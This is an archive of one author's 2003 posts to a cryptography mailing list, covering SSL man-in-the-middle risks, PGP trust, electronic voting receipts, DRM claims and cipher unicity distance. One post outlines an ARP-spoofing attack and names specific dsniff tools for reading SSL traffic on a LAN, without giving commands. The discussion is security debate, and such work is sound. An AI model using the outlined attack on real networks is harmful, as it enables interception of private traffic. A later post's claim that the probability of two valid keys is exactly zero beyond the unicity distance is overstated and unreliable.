Re: Run a remailer, go to jail?

2003-03-31 Thread Ed Gerck
It would also outlaw pre-paid cell phones, that are anonymous
if you pay in cash and can be untraceable after a call. Not to
mention proxy servers. On the upside, it would ban spam ;-)

Cheers,
Ed Gerck

"Perry E. Metzger" wrote:

> http://www.freedom-to-tinker.com/archives/000336.html
>
> Quoting:
>
> Here is one example of the far-reaching harmful effects of
> these bills. Both bills would flatly ban the possession, sale,
> or use of technologies that "conceal from a communication
> service provider ... the existence or place of origin or
> destination of any communication".
>
> --
> Perry E. Metzger[EMAIL PROTECTED]
>
> -
> The Cryptography Mailing List
> Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck

Ben Laurie wrote:

> It seems to me that the difference between PGP's WoT and what you are
> suggesting is that the entity which is attempting to prove the linkage
> between their DN and a private key is that they get to choose which
> signatures the relying party should refer to.

PGP's WoT already does that. To be clear, in PGP the entity that is attempting
to prove the linkage between a DN and a public key chooses which signatures
are acceptable, their "degree of trust", and how these signatures became
acceptable in the first place. BTW, a similar facility also exists in X.509, where
the entity that is attempting to prove the linkage may  accept or reject a CA
for that purpose (unfortunately, browsers make this decision "automatically"
for the user but it does not need to be so).

That said, the paper does not provide a way to implement the method I
suggested. The paper only shows that such a method should exist.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


Jeroen van Gelderen wrote:

> On Tuesday, Mar 25, 2003, at 14:38 US/Eastern, Ed Gerck wrote:
> > Let me summ up my earlier comments: Protection against
> > eavesdropping without MITM protection is not protection
> > against eavesdropping.
>
> You are saying that active attacks have the same cost as passive
> attacks. That is ostensibly not correct.

Cost is not the point even though cost is low and within the reach of
script kiddies.

> What we would like to do however is offer a little privacy protection
> trough enabling AnonDH by flipping a switch. I do have CPU cycles to
> burn. And so do the client browsers. I am not pretending to offer the
> same level of security as SSL certs (see note [*]).

I agree with this. This is helpful. However, supporting this by
asking "Who's afraid of Mallory Wolf?" is IMO not helpful --
because we should all be afradi fo MITM attacks. It's not good
for security to deny an attack that is rather easy to do today.

> I'm proposing a slight, near-zero-cost improvement[*] in the status
> quo. You are complaining that it doesn't achieve perfection. I do not
> understand that.

Your proposal is, possibly, a good option to have. However, it does not:
provide a credible protection against eavesdropping. It is better than
ROT13, for sure.

Essentially, you're asking for encryption without an authenticated end-point.
This is acceptable. But I suggest that advancing your idea should not be
prefaced by denying or trying to hide the real problem of MITM attacks.

Cheers,
Ed Gerck




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


Jeroen van Gelderen wrote:

> 3. A significant portion of the 99% could benefit from
> protection against eavesdropping but has no need for
> MITM protection. (This is a priori a truth, or the
> traffic would be secured with SSL today or not exist.)

Let me summ up my earlier comments: Protection against
eavesdropping without MITM protection is not protection
against eavesdropping.

In addition,  when you talk about HTTPS traffic (1%) vs.
HTTP traffic (99%) on the Internet you are not talking
about user's choices -- where the user is the party at risk
in terms of their credit card number. You're talking about
web-admins failing to protect third-party information they
request. Current D&O liability laws, making the officers
of a corporation personally responsible for such irresponsible
behavior, will probably help correct this much more efficiently
than just a few of us decrying it.

My personal view is that ALL traffic SHOULD be encrypted,
MITM protected, and authenticated, with the possibility of
anonymous authentication if so desired. Of course, this is
not practical today -- yet. But we're working to get there.
BTW, a source once told me that about 5% of all email traffic
is encrypted. So, your 1% figure is also just a part of the picture.

Cheers --/Ed Gerck






-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


Jeroen van Gelderen wrote:

> Heu? I am talking about HTTPS (1) vs HTTP (2). I don't see how the MSIE
> bug has any effect on this.

Maybe we're talking about different MSIE bugs, which is not hard to do ;-)
I was referring to the MSIE bug that affects the SSL handshake in HTTPS,
from the context in discussion. BTW, HTTP has no provision to prevent
MITM in any case -- in fact, establishing a MITM is part of the HTTP
tool box and used in reverse proxies for example.


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


Ben Laurie wrote:

> Ed Gerck wrote:
> > ;-) If anyone comes across a way to explain it, that does not require study,
> > please let me know and I'll post it.
>
> AFAICS, what it suggests, in a very roundabout way, is that you may be
> able to verify the binding between a key and some kind of DN by being
> given a list of signatures attesting to that binding. This is pretty
> much PGP's Web of Trust, of course. I could be wrong, I only read it
> quickly.

This would still depend on what the paper calls "extrinsic references",
that are outside the dialogue and create opportunity for faults (intentional
or otherwise). The resulting problems for PGP are summarized in
www.mcg.org.br/cert.htm#1.2.




-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Who's afraid of Mallory Wolf?

2003-03-25 Thread Ed Gerck


"Jeroen C. van Gelderen" wrote:

> 1. Presently 1% of Internet traffic is protected by SSL against
> MITM and eavesdropping.
>
> 2. 99% of Internet traffic is not protected at all.

I'm sorry, but no. The bug in MSIE, that prevented the correct
processing of cert path restraints and which led to easy MITM
attacks, has been fixed for some time now.  Consulting browser
statistics sites will show that the MSIE update in question,
fueled by the need for other security updates, is making
good progress.

> 3. A significant portion of the 99% could benefit from
> protection against eavesdropping but has no need for
> MITM protection. (This is a priori a truth, or the
> traffic would be secured with SSL today or not exist.)

I'm sorry but the "a priori truth" above is false .  Ignorance about
the flaw, that is now fixed, and the need to do a LAN attack (if
you  want not to mess with the DNS) have helped avert a major
public exploit. The hole is now fixed and the logic fails for this
reason as well.

> 4. The SSL infrastructure (the combination of browsers,
> servers and the protocol) does not allow the use of
> SSL for privacy protection only. AnonDH is not supported
> by browsers and self-signed certificates as a workaround
> don't work well either.

There is a good reason -- MITM. AnonDH and self-signed
certs cannot prevent MITM.

>
> 5. The reason for (4) is that the MITM attack is overrated.
> People refuse to provide the privacy protection because
> it doesn't protect against MITM. Even though MITM is not
> a realistic attack (2), (3).

But it is, please see the spoof/MITM method in my previous post.
Which, BTW, is rather old info in some circles (3 years?) and is
easy to do by script kiddies with no knowledge about anything we
are talking here -- they can simply do it. Anyone can do it.

> (That is not to say that (1) can do without MITM
>  protection. I suspect that IanG agrees with this
>  even though his post seemed to indicate the contrary.)

I think Ian's post, with all due respect to Ian, reflects a misconception
about cert validation. The misconception is that cert validation can
be provided as an absolute reference -- it cannot. The *mathematical*
reasons are explained in the paper I cited. This misconception
was discussed some 6 years in the ssl-talk list and other lists, and
clarified at the time -- please see the archives. It was good, however,
to post this again and, again, to allow this to be clarified.

>
> 6. What is needed is a system that allows hassle-free,
> incremental deployment of privacy-protecting crypto
> without people whining about MITM protection.

You are asking for the same thing that was asked, and answered,
6 years ago in the ssl-talk and other lists. There is a way to do it
and the way is not self-signed certs or SSL AnonDH.

> Now, this is could be achieved by enabling AnonDH in the SSL
> infrastructure and making sure that the 'lock icon' is *not* displayed
> when AnonDH is in effect. Also, servers should enable and support
> AnonDH by default, unless disabled for performance reasons.

Problem -- SSL AnonDH cannot prevent MITM. The solution is
not to deny the problem and ask "who cares about MITM?"

> Ed Gerck wrote:
> > BTW, this is NOT the way to make paying for CA certs go
> > away. A technically correct way to do away with CA certs
> > and yet avoid MITM has been demonstrated to *exist*
> > (not by construction) in 1997, in what was called intrinsic
> > certification -- please see  www.mcg.org.br/cie.htm
>
> Phew, that is a lot of pages to read (40?). Its also rather though
> material for me to digest. Do you have something like an example
> approach written up? I couldn't find anything on the site that did not
> require study.
>
;-) If anyone comes across a way to explain it, that does not require study,
please let me know and I'll post it.

OTOH, some practical code is being developed, and has been sucessfully
tested in the past 3 years with up to 300,000 simultaneous users, which
may provide the example you ask for. Please write to me privately if you'd
like to use it.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Who's afraid of Mallory Wolf?

2003-03-24 Thread Ed Gerck

Ian Grigg wrote:

> ...
> The analysis of the designers of SSL indicated
> that the threat model included the MITM.
>
> On what did they found this?  It's hard to pin
> it down, and it may very well be, being blessed
> with nearly a decade's more experience, that
> the inclusion of the MITM in the threat model
> is simply best viewed as a mistake.

I'm sorry to say it but MITM is neither a fable nor
restricted to laboratory demos. It's an attack available
today even to script kiddies.

For example, there is a possibility that some evil attacker
redirects the traffic from the user's computer to his own
computer by ARP spoofing. With the programs arpspoof,
dnsspoof and webmitm in the dsniff package it is possible
for a script kiddie to read the SSL traffic in cleartext (list
of commands available if there is list interest). For this attack
to work the user and the attacker must be on the same LAN
or ... the attacker could be somewhere else using a hacked
computer on the LAN -- which is not so hard to do ;-)

>...
> Clearly, the browsers should not discriminate
> against cert-less browsing opportunities

The only sign of the spoofing attack is that the user gets a
warning about the certificate that the attacker is presenting.
It's vital that the user does not proceed if this happens --
contrary to what you propose.

BTW, this is NOT the way to make paying for CA certs go
away. A technically correct way to do away with CA certs
and yet avoid MITM has been demonstrated to *exist*
(not by construction) in 1997, in what was called intrinsic
certification -- please see  www.mcg.org.br/cie.htm

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: double shot of snake oil, good conclusion

2003-03-08 Thread Ed Gerck
Tal Garfinkel wrote:

> ...
> Clearly, document controls are not a silver bullet, but if used properly
> I believe they do provide a practical means of helping to restrict the
> propagation of sensitive information.

I believe we are in agreement in many points. Microsoft's mistake was
to claim that "For example, it might be possible to view a document but
not to forward or print it."  As I commented, of course it is possible
to copy of forward it.  Thus, claiming that it isn't possible is snake oil
and I think we need to point it out.

I'd hope that the emphasis on trustworthy computing will help Microsoft
weed out these declarations and, thus, help set a higher standard.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Scientists question electronic voting

2003-03-07 Thread Ed Gerck


"(Mr) Lyn R. Kennedy" wrote:

> On Thu, Mar 06, 2003 at 10:35:22PM -0500, Barney Wolff wrote:
> >
> > We certainly don't want an electronic system that is more
> > vulnerable than existing systems, but sticking with known-to-be-terrible
> > systems is not a sensible choice either.
>
> Paper ballots, folded, and dropped into a large transparent box, is not a
> broken system.

The broken system is the *entire* system -- from voter registration,
to ballot presentation (butterfly?), ballot casting, ballot storage,
tallying, auditing, and reporting.

> It's voting machines, punch cards, etc that are broken.
> I don't recall seeing news pictures of an election in any other western
> democracy where they used machines.

Brazil, 120 million voters, 100% electronic in 2002, close to 100%
since the 90's, no paper copy (and it failed when tried). BTW, the
3 nations with largest number of voters are, respectively:

- India
- Brazil
- US

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Scientists question electronic voting

2003-03-07 Thread Ed Gerck


David Howe wrote:

> "Francois Grieu" <[EMAIL PROTECTED]> wrote:
> > Then there is the problem that the printed receipt must not be usable
> > to determine who voted for who, even knowing in which order the
> > voters went to the machine. Therefore the printed receipts must be
> > shuffled. Which brings us straight back to papers in a box, that we
> > shake before opening.
> This may be the case in france - but in england, every vote slip has a
> unique number which is recorded against the voter id number on the
> original voter card. any given vote *can* be traced back to the voter
> that used it.

This is true in the UK, but legal authorization is required to do so. In
the US, OTOH, the paper voting systems today are done in such a way
that the privacy of the vote is immune even to a court order to disclose it.
Voters are not anonymous, as they must be identified and listed in the
voter list at each poll place, but it is impossible (or, should be) to link
a voter to a vote.  This imposes, for example, limits on the time-stamp
accuracy and other factors suhc as storage ordering that could help in
linking a voter to a vote.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Scientists question electronic voting

2003-03-07 Thread Ed Gerck


Anton Stiglic wrote:

> - Original Message -
> From: "Ed Gerck" <[EMAIL PROTECTED]>
>
> [...]
> > "For example, using the proposed system a voter can easily, by using a
> > small concealed camera or a cell phone with a camera, obtain a copy of
> > that receipt and use it to get money for the vote, or keep the job. And
> > no one would know or be able to trace it."
>
> But that brings up my point once again:  These problems already exist
> with current paper-ballot voting schemes,

Maybe you missed some of my comments before, but these problems
do not exist in current paper-ballot voting schemes. Why should
e-voting make it worse?

> what exactly are you trying to
> achieve with an electronic voting scheme?

My target is the same level of voter privacy and election integrity that a
paper-ballot system has when ALL election clerks are honest and do not
commit errors. Please see Proc. Financial Cryptography 2001, p. 257 and
258 of my article on "Voting System Requirements", Springer Verlag.

> To you simply want to make
> the counting of the votes more reliable, and maintain the security of all
> other aspects, or improve absolutely everything?

Of all aspects that need to be improved when moving to an electronic
system, the most important is the suspicion or fear that thousands or even
millions of electronic records could be altered with a keystroke, from
a remote laptop or some untraceable source. This goes hand-in-hand
with questions about the  current "honor system" in voting systems,
where vendors make the machines and also operate them during an
election. It's the overall black box approach that needs to improved.
The "trust me!" approach has had several documented problems
in paper ballot systems and would present even more opportunities
for fraud or even plain simple errors in an electronic system.

The solution is to add multiple channels with at least some independence.
The paper channel is actually hard to secure and expensive to store
and process. Paper would also be a step backwards in terms of efficiency
and there is nothing magical about a paper copy that would make it
invulnerable to fraud/errors.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck
Dan Riley wrote:

> The vote can't be final until the voter confirms the paper receipt.
> It's inevitable that some voters won't realize they voted the wrong
> way until seeing the printed receipt, so that has to be allowed for.
> Elementary human factors.

This brings in two other factors I have against this idea:

- a user should not be called upon to distrust the system that the user
is trusting in the first place.

- too many users may reject the paper receipt because they changed their
minds, making it impossible to say whether the e-vote was wrong or
correct based on the number of rejected e-votes.

> But this whole discussion is terribly last century--still pictures are
> passe.  What's the defense of any of these systems against cell phones
> that transmit live video?

This was in my first message, and some subsequent ones too:

"For example, using the proposed system a voter can easily, by using a
small concealed camera or a cell phone with a camera, obtain a copy of
that receipt and use it to get money for the vote, or keep the job. And
no one would know or be able to trace it."

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


multiple system - Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck


"Trei, Peter" wrote:

> Ballot boxes are also subject to many forms of fraud. But a dual
> system  (electronic backed up by paper) is more resistant to
> attack then either alone.

The dual, and multiple, system can be done without paper ballot.
There is nothing "magic" about paper as a record medium. I
can send a link for a paper on this that was presented at the
Tomales Bay conference on voting systems last year, using Shannon's
Tenth Theorem as the theoretical background, introducing the idea
of multiple "witnesses". If two witnesses are not 100% mutually
dependent, the probability that both witnesses may fail at the same
time is smaller than that of any single witness to fail.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck


David Howe wrote:

> at Thursday, March 06, 2003 5:02 PM, Ed Gerck <[EMAIL PROTECTED]> was seen
> to say:
> > On the other hand, photographing a paper receipt behind a glass, which
> > receipt is printed after your vote choices are final, is not readily
> > deniable because that receipt is printed only after you confirm your
> > choices.
> as has been pointed out repeatedly - either you have some way to "bin"
> the receipt and start over, or it is worthless (and merely confirms you
> made a bad vote without giving you any opportunity to correct it)
> That given, you could vote once for each party, take your photograph,
> void the vote (and receipt) for each one, and then vote the way you
> originally intended to :)

No, as I commented before, voiding the vote in that proposal after the paper
receipt is printed is a serious matter -- it means that either the machine made
an error in recording the e-vote or (as it is oftentimes neglected) the machine
made an error in printing the vote. The voter's final choice and legally binding
confirmation is made before the printing. And that is where the problems
reside (the problems that we were trying to solve in the first place), in that
printed ballot. Plus the problem of the voter being able to photograph
that final receipt and present it as direct proof of voting, as the voter
leaves the poll place (with no chance for image processing) or by
an immediate link by cell phone (ditto).

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck
bear wrote:

> Let's face it, if somebody can *see* their vote, they can record it.

Not necessarily. Current paper ballots do not offer you a way to record
*your* vote. You may even photograph your ballot but there is no way to
prove that *that* was the ballot you did cast. In the past, we had ballots with
different collors for each party ;-) so people could see if you were voting
Republican or Democrat, but this is no longer the case.


> and if someone can record it, then systems for counterfeiting such a
> record already exist and are already widely dispersed.

It's easier than one may think to have a reliable proof, if you can photograph
the ballot that you *did* cast (as in that proposal for printing a paper receipt
with your vote choices) -- just wait out of the poll place and demand the
film right there, or wait out of the poll place, hear the voter's voice right
then and get the image sent by the cell phone before the voter leaves the
poll booth.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck


Anton Stiglic wrote:

> -Well the whole process can be filmed, not necessarily photographed...
> It's difficult to counter the "attack".  In you screen example, you can
> photograph
> the vote and then immediately photograph the "thank you", if the photographs
> include the time in milliseconds, and the interval is short, you can be
> confident
> to some degree that the vote that was photographed was really the vote that
> was casted.
> You can have tamper resistant film/photograph devices and whatever you want,
> have the frames digitally signed and timestamped,
> but this is where I point out that you need to consider the value of the
> vote to
> estimate how far an extortionist would be willing to go.

The electronic process can be made much harder to circumvent by
allowing voters to cast any number of ballots but counting only the last
ballot cast. Since a voter could always cast another vote after the one that
was so carefully filmed, there would be no value for such film.

BTW, a similar process happens in proxy voting for shareholders meeting,
where voters can send their vote (called a "proxy") before the meeting
but can also go to the meeting and vote any way they please -- trumping
the original vote.

Much work needs to be done, and tested, to protect the integrity of
public elections. Even with all such precautions, if  the choices made by
a voter are disclosed (ie, not just the tally for all voters) then a voter
can be identified by using an unlikely pattern -- and the Mafia has,
reportedly, used this method in Italy to force (and enforce) voter
choices in an otherwise private ballot.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: double shot of snake oil, good conclusion

2003-03-06 Thread Ed Gerck


Tal Garfinkel wrote:

> The value of these type of controls that they help users you basically
> trust who might be careless, stupid, lazy or confused to do the right
> thing (however the right thing is defined, according to your company
> security policy).

It beats me that "users you basically trust" might also be "careless, stupid,
lazy or confused" ;-)

Your point might be better expressed as "the company security policy would
be followed even if you do NOT trust the users to do the right thing." But,
as we know, this only works if the users are not malicious, if social engineering
cannot be used, if there are no disgruntled employees, and other equally
improbable factors.

BTW, one of the arguments that Microsoft uses to motivate people to
be careful with unlawful copies of Microsoft products is that disgruntled
employees provide the bulk of all their investigations on piracy, and everyone
has disgruntled employees. We also know that insider threats are responsible
for 71% of computer fraud.

Thus, the lack of value of these type of controls is to harass the legitimate users
and give a false sense of security. It reminds me of a cartoon I saw recently,
where the general tells a secretary to shred the document, but make a copy
first for the files.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: Scientists question electronic voting

2003-03-06 Thread Ed Gerck


Anton Stiglic wrote:

> An extortionist could provide their own camera device to the voter, which
> has
> a built in clock that timestamps the photos and does some watermarking, or
> something like that, which could complicate the counter-measures. But this
> problem already exists with current non-electronic voting scheme.
> It depends on the value attributed to a vote (would an extortionist be
> willing to provide these custom devices?).

This is not possible for current paper ballots, for several reasons. For
example, if you take a picture of your punch card as a proof of how you
voted, what is to prevent you -- after the picture is taken -- to punch
another hole for the same race and invalidate your vote? Or, to ask the
clerk for a second ballot, saying that you punched the wrong hole,
and vote for another candidate?  The same happens for optical scan
cards.  These "proofs" are easily deniable and, thus, have no value
to prove how the voter actually voted.

Likewise, electronically, there is no way that a voter could prove how he
voted, even if the confirmation screen does list all the choices that the voter
has chosen, if that screen has two buttons: "go back", "confirm", and a
suitable logic. After the voter presses "confirm" the voter sees a "thank you"
screen without any choices present. The logic canbe set up in such a way
in terms of key presses and intermediate states that even photographing
the mouse cursor on a pressed "confirm" button does not prove that the voter
did not take the mouse out and, instead, pressed the "go back" button to
change his choices.

On the other hand, photographing a paper receipt behind a glass, which
receipt is printed after your vote choices are final, is not readily deniable
because that receipt is printed only after you confirm your choices.

To deny that receipt the voter would have to say that the machine erred,
which, if proved otherwise, could lead to criminal charges (e.g., the
machine would be taken off the polls and, after the polls close the
machine would be tallied; if the electronic tally would agree with the
paper tally, the voter would be in trouble).

Protection against providing voters a receipt, voluntary or not, is often
overlooked by those who are not familiar with election issues.  For
example, the first press release by MIT/Caltech principals after Nov/2000 said
that the solution would be to provide the voter with a receipt showing how
they voted. Later on, MIT/Caltech reformed that view and have been doing an
excellent job at what I see as a process of transforming elections from art
to science, which is a good development after Nov/2000.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Scientists question electronic voting

2003-03-05 Thread Ed Gerck

Henry Norr had an interesting article today at
http://sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2003/03/03/BU122767.DTL&type=business

Printing a paper receipt that the voter can see is a proposal that addresses
one of the major weaknesses of electronic voting. However, it creates
problems that are even harder to solve than the silent subversion of e-records.

For example, using the proposed system a voter can easily, by using a
small concealed camera or a cell phone with a camera, obtain a copy of
that receipt and use it to get money for the vote, or keep the job. And
no one would know or be able to trace it.

Of course, proponents of the paper ballot copy, like Peter Neumann and
Rebecca Mercuri, will tell you the same thing that Peter affirmed in an official
testimony  before the California Assembly Elections & Reapportionment Committee
on January 17, 2001, John Longville, Chair, session on touch-screen (DRE)
voting systems, as recorded by C-SPAN (video available):

  "...I have an additional constraint on it [a voter approved paper ballot produced
  by a DRE machine] that  it  is behind reflective glass so that if you try to
  photograph it with a little secret camera hidden in your tie so you can go out and
  sell your vote for a bottle of whiskey or whatever it is, you will get a blank image.
  Now this may sound ridiculous from the point of view of trying to protect the
  voter, but this problem of having a receipt in some way that verifies that what
  seems to be your vote actually was recorded properly, is a fundamental issue."

I was also in Sacramento that same day, and this was my reply, in the next panel,
also with a C-SPAN videotape:

  ".. I would like to point out that it is very hard sometimes to take opinions, even
  though from a valued expert, at face value. I was hearing the former panel [on
  touch screen DRE systems] and Peter Neumann, who is a man beyond all best
  qualifications, made the affirmation that we cannot photograph what we can see.
  As my background is in optics, with a doctorate in optics, I certainly know that is
  not correct. If we can see the ballot we can photograph it, some way or another."

But, look, it does not require a Ph.D. in physics to point out that what Peter says is
incorrect -- of course you can photograph what you see. In other words, Peter's
"solution" goes as much of this DRE discussion has also gone -- it's paying lip service
to science but refutes basic scientific principles and progress.  After all, what's the
scientific progress behind storing a piece of paper as evidence? And, by the way, are
not paper ballots what were mis-counted, mis-placed and lost in Florida?

Finally, what we see in this discussion is also exactly what we in IT security
know that we need to avoid. Insecure statements that create a false sense of
security -- not to mention a real sense of angst. This statement, surely vetted by
many people before it was printed, points out how much we need to improve in
terms of a real-world model for voting.

This opinion is my own, and is not a statement by any company.

Cheers,
Ed Gerck

-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Comments/summary on unicity discussion

2003-03-05 Thread Ed Gerck
e. This
is often confusing and may provide the wrong impressions that
nothing is gained by compression or that we may need to "hide"
the compression algorithm from the attacker.


2. READING THE FINE PRINT
Of further importance and often ignored or even contradicted by
some statements in the literature such as "any cipher can be attacked by
exhaustively trying all possible keys", I usually like to call attention to
the fact that any cipher (including 56-bit-key DES) can be theoretically
secure against any attacker -- even an attacker with unbounded
resources -- when the cipher is used within its unicity. Not only the
One-Time Pad is theoretically secure, but any cipher can be theoretically
secure if used within the unicity distance. Thus, indeed there is a
theoretically secure defense even against brute-force attacks, which is to
work within the unicity limit of the cipher. And, it works for any cipher
that is a good random cipher -- irrespective of key-length or encryption
method used.

It is also important to note, as the literature has also not been very neat
in this regard, that unicity is always referred to the plaintext. However,
it may also be applied to indicate the least amount of ciphertext which
needs to be intercepted in order to attack the cipher -- within the
ciphertext/plaintext granularity. For example, for a simple OTP-cipher,
being sloppy works because one byte of ciphertext links back to one
byte of plaintext -- so, a unicity of n bytes implies n bytes of ciphertext.
For DES, however, the ciphertext must be considered in blocks of 8
bytes -- so, a unicity of n bytes implies a corresponding modular number
of 8 bytes.

3. ONLINE REFERENCES

[Sha48] Shannon, C. Communication Theory of Secrecy Systems. Bell Syst.
Tech. J., vol. 28, pp. 656-715, 1949.  See also
http://www3.edgenet.net/dcowley/docs.html for readable scanned images of
the complete original paper and Shannon's definition of "unicity distance" in
page 693.  Arnold called my attention to a typeset version of the paper at
http://www.cs.ucla.edu/~jkong/research/security/shannon.html.

[Sha49] Shannon, C. A Mathematical Theory of Communication. Bell Syst.
Tech. J., vol. 27, pp. 379-423, July 1948. See also
http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html

Anton also made available the following link, with notes he took for
Claude Crepeau's crypto course at McGill. See page 24 and following at
http://crypto.cs.mcgill.ca/~stiglic/Papers/crypto1.ps
(Anton notes that it's not unlikely that there are errors in those notes).

Comments are welcome.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: double shot of snake oil, good conclusion

2003-03-05 Thread Ed Gerck

"A.Melon" wrote:

> Ed writes claiming this speculation about Palladium's implicatoins is
> mis-informed:
>
> > while others speculated on "another potentially devastating effect",
> > that the DRM could, via a loophole in the DoJ consent decree, allow
> > Microsoft to withhold information about file formats and APIs from
> > other companies which are attempting to create compatible or
> > competitive products
>
> I think you misunderstand the technical basis for this claim.  The
> point is Palladium would allow Microsoft to publish a file format and
> yet still control compatibility via software certification and
> certification on content of the software vendor who's software created
> it.

We are in agreement. When you read the whole paragraph that I wrote,
I believe it is clear that my comment was not whether the loophole existed
or not. My comment was that there was a much more limited implication
for whistle-blowing because DRM can't really control what humans do
and there is no commercial value in saying that a document that I see
cannot be printed or forwarded -- because it can.

> Your other claims about the limited implications for whistle-blowing
> (or file trading of movies and mp3s) I agree with.

And that's what my paragraph meant.

Cheers,
Ed Gerck


-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


double shot of snake oil, good conclusion

2003-03-02 Thread Ed Gerck

#1
In  http://www.extremetech.com/article2/0,3973,906344,00.asp,
this article on MS DRM states: "For example, it might be possible to
view a document but not to forward or print it."

This is, of course, blatantly false. Of course it can, by using a screenshot,
a camera, a cell phone with camera or, simply, human memory. With all
due respect, the claim is snake oil.

This is exactly what we in IT security must avoid. Insecure statements that
create a false sense of security -- not to mention a real sense of angst. This
statement, surely vetted by many people before it was printed, points out
how much we need to improve in terms of a real-world model for IT security.

And that is why, today, IT security failures are causing an estimated
loss of $60B/year (ASIS, PricewaterhouseCoopers, 2001).

#2
The second shot of snake oil came when some people, without realizing
the trap, started to get alarmed by the snake oil shot #1 and started
speculating on "the chilling effect that such measures could have on
corporate whistleblowers" while others speculated on "another potentially
devastating effect", that the DRM could, via a loophole in the  DoJ
consent decree, allow Microsoft to withhold information about file
formats and APIs from other companies which are attempting to create
compatible or competitive products -- compatible, that is, with the first
shot of snake oil.

The good conclusion from all of this seems to be that while humans are the
weakest link in a virtuous security system, they can also help break a
non-virtuous security system -- DRM snake oil claims notwithstanding.

Cheers,
Ed Gerck



-
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to [EMAIL PROTECTED]


Re: AES-128 keys unique for fixed plaintext/ciphertext pair?

2003-02-21 Thread Ed Gerck


"Arnold G. Reinhold" wrote:

> At 2:18 PM -0800 2/19/03, Ed Gerck wrote:
> >The previous considerations hinted at but did not consider that a
> >plaintext/ciphertext pair is not only a random bit pair.
> >
> >Also, if you consider plaintext to be random bits you're considering a very
> >special -- and least used -- subset of what plaintext can be. And, it's a
> >much easier problem to securely encrypt random bits.
> >
> >The most interesting solution space for the problem, I submit, is in the
> >encryption of human-readable text such as English, for which the previous
> >considerations I read in this list do not apply, and provide a false sense of
> >strength. For this case, the proposition applies -- when qualified for  the
> >unicity.
> >
>
> Maybe I'm missing something here, but the unicity rule as I
> understand it is a probabilistic result.  The likelihood of two keys
> producing different natural language plaintexts from the same cipher
> text falls exponentially as the message length exceeds the unicity
> distance, but it never goes to zero.

Arnold,

This may sound intuitive but is not correct. Shannon proved that if
"n" (bits, bytes, letters, etc.) is the unicity distance of a ciphersystem,
then ANY message  that is larger than "n" bits CAN be uniquely deciphered
from an analysis of its ciphertext -- even though that may require some
large (actually, unspecified) amount of work. Thus, the likelihood of
of two keys producing valid decipherments (as plaintexts that can be
enciphered to the same ciphertext, natural language or not), from the
same ciphertext is ZERO after the message length exceeds the unicity
distance -- otherwise the message could not be uniquely deciphered
after the unicity condition is reached, breaking Shannon's result.

Conversely, Shannon also proved that if the intercepted message has less
than "n" (bits, bytes, letters, etc.) of plaintext then the message CANNOT
be uniquely deciphered from an analysis of its ciphertext -- even by trying
all keys and using unbounded resources.

> So unicity can't be used to
> answer the original question* definitively.

As above, it can. And the answer formulated in terms of the unicity
is valid for any plaintext/ciphertext pair, even for random bits. It
answers the question in all generality.

> I'd also point out that modern ciphers are expected to be secure
> against know plaintext attacks, which is generally a harsher
> condition than knowing the plaintext is in natural language.

No cipher is theoretically secure above the unicity distance, even though
it may be practically secure.

> * Here is the original question. It seems clear to me that he is
> asking about all possible plaintext bit patterns:
>
